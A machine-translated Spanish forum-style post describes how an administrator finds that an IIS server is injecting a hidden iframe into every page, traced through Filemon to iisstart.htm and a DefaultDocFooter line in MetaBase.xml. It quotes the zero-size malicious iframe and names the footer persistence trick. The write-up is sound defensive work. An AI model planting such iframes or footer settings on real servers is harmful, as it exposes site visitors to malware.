Cuando un servidor abre casi todos los sitios web, aparecen incluso páginas HTML.
<iframe src=" http://xxxdfsfd/web.htm " altura=0 ancho=0></iframe>
Parte de este estilo de código se encuentra en la parte principal y parte en la parte final. El software antivirus informará sobre los virus cuando se abra.
No puedo encontrar este código en el código fuente cuando abro la página HTML o ASP PHP.
Analiza las razones
Primero, sospeché de malware ARP. Utilicé herramientas anti-ARP y no encontré ninguna suplantación de arp.
Además, la suplantación de identidad de arp generalmente no se inserta en el código cada vez, pero a veces y a veces
Y también puedes encontrar este código al acceder usando http://127.0.0.1 o http://localhost
Se elimina la posibilidad de suplantación de identidad por parte de arp.
Luego pensé que el JS podría haber sido manipulado u otros archivos incluidos. Después de la búsqueda, no se encontraron páginas modificadas. Incluso al navegar por la página HTML recién creada, este código se insertará, por lo que solo se puede colgar a través de IIS. .
Después de hacer una copia de seguridad de los datos de iis y luego reinstalar iis, el código desapareció. Después de restaurar la copia de seguridad de iis, el problema volvió.
Después de buscar detenidamente, el problema debería estar en el archivo de configuración de IIS. Cuando abrí el archivo de configuración, no encontré ese fragmento de código.
Es muy probable que se esté llamando a un determinado archivo. ¿Cómo puedo comprobar esto? De repente me acordé del famoso Filemon.
Descargué uno localmente y lo subí al servidor. Abrí Filemon. Había demasiados datos. Filtré algunos inútiles.
Solo queda el proceso iis y todavía hay muchos datos. Parece que muchas personas están visitando el sitio en el servidor.
Cierre todos los sitios y cree un sitio de prueba. El directorio es D:www y cree una página en blanco test.htm a continuación.
Visite esta página, el código ha sido insertado y eche un vistazo a Filemon. Es extraño cómo leer C:Inetpubwwwrootiisstart.htm.
Abra C:Inetpubwwwrootiisstart.htm y vea que hay
<iframe src=" http://xxxdfsfd/web.htm " altura=0 ancho=0></iframe>
Elimine el código y déjelo en blanco. Al acceder a test.htm, es normal. Elimine C:Inetpubwwwrootiisstart.htm y acceda nuevamente.
Aquí es donde aparece el problema de "Error al leer el archivo de pie de página de datos" en test.htm. Parece que se llama.
este archivo.
Será normal si borra C:Inetpubwwwrootiisstart.htm. ¿Cómo se puede hacer esto? Para resolver el problema, por supuesto, debe desconectarlo.
continuar
¿Es posible que sea causado por una extensión? Lo revisé en la extensión y todo está normal.
Por supuesto, también existen troyanos a través de ISAPI.
Después de mucha deliberación, finalmente sentí que algo andaba mal con el archivo de configuración.
Abra el archivo de configuración, que se encuentra en %windir%system32inetsrvMetaBase.xml
Ábrelo con el Bloc de notas, busca iisstart.htm y encuentra una línea. Al principio pensé que era el sitio predeterminado, pero luego pensé que estaba mal.
Los sitios predeterminados han sido eliminados. Mire más de cerca este código:
DefaultDocFooter="ARCHIVO:C:Inetpubwwwrootiisstart.htm"
Elimina esta línea y el problema estará completamente resuelto.